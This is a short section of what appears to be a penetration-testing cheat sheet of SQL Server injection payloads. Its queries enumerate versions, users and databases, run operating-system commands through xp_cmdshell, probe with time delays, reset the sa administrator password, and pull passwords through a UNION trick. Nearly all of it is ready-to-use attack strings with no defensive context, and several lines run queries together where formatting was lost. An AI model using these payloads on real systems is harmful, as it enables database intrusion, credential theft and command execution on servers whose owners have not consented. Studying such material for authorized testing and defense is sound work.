4.1.7.1. SQL Server Payload¶
- Version
SELECT @@version
- Comment
SELECT 1 -- commentSELECT /*comment*/1
- Space
0x01 - 0x20
- Current User
SELECT user_name()SELECT system_userSELECT userSELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
- List User
SELECT name FROM master..syslogins
- Current Database
SELECT DB_NAME()
- List Database
SELECT name FROM master..sysdatabases
- Command
EXEC xp_cmdshell 'net user'
- Ascii
SELECT char(0x41)SELECT ascii('A')SELECT char(65)+char(66)=> returnAB
- Delay
WAITFOR DELAY '0:0:3'pause for 3 seconds
- Change Password
ALTER LOGIN [sa] WITH PASSWORD=N'NewPassword'
- Trick
id=1 union:select password from:user